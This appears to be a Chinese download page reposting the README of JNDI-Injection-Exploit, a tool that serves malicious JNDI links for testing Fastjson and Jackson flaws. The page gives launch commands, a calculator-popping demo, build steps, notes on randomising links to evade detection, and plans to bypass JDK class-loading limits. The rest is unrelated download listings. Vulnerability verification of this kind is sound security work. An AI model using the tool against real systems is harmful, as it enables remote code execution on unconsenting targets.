資料介紹
軟件簡介
JNDI-Injection-Exploit —— JNDI 注入利用工具,生成 JNDI 鏈接并啟動后端相關(guān)服務(wù),可用于 Fastjson、Jackson 等相關(guān)漏洞的驗證。
使用
可執(zhí)行程序為 jar 包,在命令行中運行以下命令:
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
其中:
-
-C?- 遠(yuǎn)程 class 文件中要執(zhí)行的命令。
(可選項 , 默認(rèn)命令是 mac 下打開計算器,即"open /Applications/Calculator.app")
-
-A?- 服務(wù)器地址,可以是 IP 地址或者域名。
(可選項 , 默認(rèn)地址是第一個網(wǎng)卡地址)
注意:
-
要確保?1099、1389、8180?端口可用,不被其他程序占用。
或者你也可以在 run.ServerStart 類 26~28 行更改默認(rèn)端口。
-
命令會被作為參數(shù)傳入?Runtime.getRuntime().exec(),
所以需要確保命令傳入 exec() 方法可執(zhí)行。
bash等可在shell直接執(zhí)行的相關(guān)命令需要加雙引號,比如說 java -jar JNDI.jar -C "bash -c ..."
示例
本地演示:
-
啟動 JNDI-Injection-Exploit:
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"

我們需要把第一步中生成的 JNDI 鏈接注入到存在漏洞的應(yīng)用環(huán)境中,方便解釋用如下代碼模仿漏洞環(huán)境:
public static void main(String[] args) throws Exception{
InitialContext ctx = new InitialContext();
ctx.lookup("rmi://127.0.0.1/fgf4fp");
}
當(dāng)上面代碼運行后,應(yīng)用便會執(zhí)行相應(yīng)命令,這里是彈出計算器,沒截圖,可以自己測一下。
截圖是工具的server端日志:

安裝
下面兩種方法都可以得到Jar包
-
把源碼下載到本地然后自行編譯打包。(在Java1.7+ 、Java1.8+ 和 Maven 3.x+環(huán)境下測試可以)
$ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
$ cd JNDI-Injection-Exploit$ mvn clean package -DskipTests
工具實現(xiàn)
- 首先生成的鏈接后面codebaseClass是6位隨機的,這個是因為不希望讓工具生成的鏈接本身成為一種特征被監(jiān)控或攔截。
- 服務(wù)器地址實際就是codebase地址,相比于marshalsec中的JNDI server來說,這個工具把JNDI server和HTTP server綁定到一起,并自動啟動HTTP server返回相應(yīng)class,更自動化了。
- HTTP server基于jetty實現(xiàn)的,本質(zhì)上是一個能下載文件的servlet,比較有意思的是我提前編譯好class模板放到resource目錄,然后servlet會讀取class文件,使用ASM框架對讀取的字節(jié)碼進行修改,然后插入我們想要執(zhí)行的命令,返回修改后的字節(jié)碼。
待實現(xiàn)
- (已完成EL表達式繞過部分)在更高版本的 JDK 環(huán)境中 trustURLCodebase 變量為 false,限制了遠(yuǎn)程類的加載,我會找時間把JNDI-Injection-Bypass這個項目的東西融入到本項目中,生成能繞過 JDK 限制 JNDI 鏈接。
- 常用串口通信測試工具sscom 2次下載
- 基于OTA升級的ESP01S固件測試工具 19次下載
- 可提升樣本程序軟件質(zhì)量的自動化測試工具 19次下載
- modbus調(diào)試工具
- 藍(lán)牙調(diào)試工具BTool v1.40.5資源下載 27次下載
- 納米器件的測試工具資料下載
- USB-TTL測試工具應(yīng)用程序免費下載 143次下載
- TC35短信收發(fā)測試工具下載 7次下載
- cpu性能測試工具(ORTHOS)中文版免費下載 0次下載
- 滲透測試工具開發(fā) 18次下載
- TCP/UDPDbg測試工具 319次下載
- 軟件測試工具的分類和使用 68次下載
- ICOM多串口卡測試工具
- TD-SCDMA測試工具體系及應(yīng)用
- TD-SCDMA網(wǎng)絡(luò)測試工具及手段
- Linux下的stress-ng壓力測試工具介紹 8001次閱讀
- 多核應(yīng)用調(diào)試工具CodeViser介紹 1129次閱讀
- T900串口測試工具的使用教程 2579次閱讀
- 命令執(zhí)行不回顯利用工具解讀 1310次閱讀
- 測試工具的主要目的 1155次閱讀
- 如何使用DudeSuite進行滲透測試工作 1686次閱讀
- 基于安卓的滲透測試工具集 1274次閱讀
- 詳解半導(dǎo)體封裝測試工藝 1650次閱讀
- 基于QT的串口調(diào)試工具設(shè)計 2328次閱讀
- 滲透測試工具箱siusiu的特性及使用 2777次閱讀
- 一種開源滲透測試工具toxssin介紹 1451次閱讀
- 介紹一款功能強大的自動化Deauth滲透測試工具 1280次閱讀
- 常用藍(lán)牙調(diào)試工具分享 6771次閱讀
- 123個Python滲透測試工具你了解多少黑客資源 5792次閱讀
- 常用的軟件測試工具有哪些_10款常用的軟件測試工具推薦 7.5w次閱讀
下載排行
本周
- 1PFC電路與BOOST電路設(shè)計實例分享
- 1.83 MB | 12次下載 | 4 積分
- 2世平基于靈動微 SPIN560C 的低壓無刷電機應(yīng)用方案
- 10.93 MB | 11次下載 | 免費
- 3電源測試報告-基于 國民技術(shù) N32L406 和杰華特 JW3376+3330 的 BMS 方案
- 6.47 MB | 11次下載 | 免費
- 4PWM控制器的控制方法
- 0.39 MB | 3次下載 | 4 積分
- 5電流檢測芯片F(xiàn)P135應(yīng)用說明
- 1.24 MB | 3次下載 | 免費
- 6全面解讀被動式與主動式PFC電路
- 1.27 MB | 1次下載 | 4 積分
- 7HC88L051F4低功耗芯片規(guī)格書
- 4.76 MB | 1次下載 | 免費
- 8CIU32D655x5數(shù)據(jù)手冊
- 2.14 MB | 1次下載 | 免費
本月
- 1常用電子元器件使用手冊
- 2.40 MB | 52次下載 | 免費
- 2高功率密度碳化硅MOSFET軟開關(guān)三相逆變器損耗分析
- 2.27 MB | 33次下載 | 10 積分
- 3PFC電路與BOOST電路設(shè)計實例分享
- 1.83 MB | 12次下載 | 4 積分
- 4世平基于靈動微 SPIN560C 的低壓無刷電機應(yīng)用方案
- 10.93 MB | 11次下載 | 免費
- 5電源測試報告-基于 國民技術(shù) N32L406 和杰華特 JW3376+3330 的 BMS 方案
- 6.47 MB | 11次下載 | 免費
- 6USB拓展塢PCB圖資料
- 0.57 MB | 11次下載 | 免費
- 7MS1826 HDMI 多功能視頻處理器數(shù)據(jù)手冊
- 4.51 MB | 9次下載 | 免費
- 8HAL9303線性霍爾效應(yīng)傳感器技術(shù)手冊
- 0.70 MB | 9次下載 | 免費
總榜
- 1matlab軟件下載入口
- 未知 | 935134次下載 | 10 積分
- 2開源硬件-PMP21529.1-4 開關(guān)降壓/升壓雙向直流/直流轉(zhuǎn)換器 PCB layout 設(shè)計
- 1.48MB | 420064次下載 | 10 積分
- 3Altium DXP2002下載入口
- 未知 | 233089次下載 | 10 積分
- 4電路仿真軟件multisim 10.0免費下載
- 340992 | 191424次下載 | 10 積分
- 5十天學(xué)會AVR單片機與C語言視頻教程 下載
- 158M | 183352次下載 | 10 積分
- 6labview8.5下載
- 未知 | 81600次下載 | 10 積分
- 7Keil工具MDK-Arm免費下載
- 0.02 MB | 73818次下載 | 10 積分
- 8LabVIEW 8.6下載
- 未知 | 65991次下載 | 10 積分
電子發(fā)燒友App






創(chuàng)作
發(fā)文章
發(fā)帖
提問
發(fā)資料
發(fā)視頻
上傳資料賺積分
評論